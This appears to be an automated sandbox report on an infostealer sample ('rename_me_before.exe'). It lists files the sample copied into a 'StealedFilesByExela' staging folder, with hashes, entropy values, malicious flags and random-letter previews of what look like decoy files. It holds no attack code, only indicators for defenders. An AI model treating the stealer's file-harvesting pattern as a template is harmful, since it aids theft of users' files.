                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DTBZGIOOSO\ONBQCLYSPU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DTBZGIOOSO\UMMBDNEQBN.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DTBZGIOOSO\VLZDGUKUTZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DTBZGIOOSO\XZXHAVGRAG.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\BPMLNOBVSB.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\DTBZGIOOSO.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\DVWHKMNFNN.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\FENIVHOIKN.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                                          MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                                          SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                                          SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                                          SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\HTAGVDFUIE.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
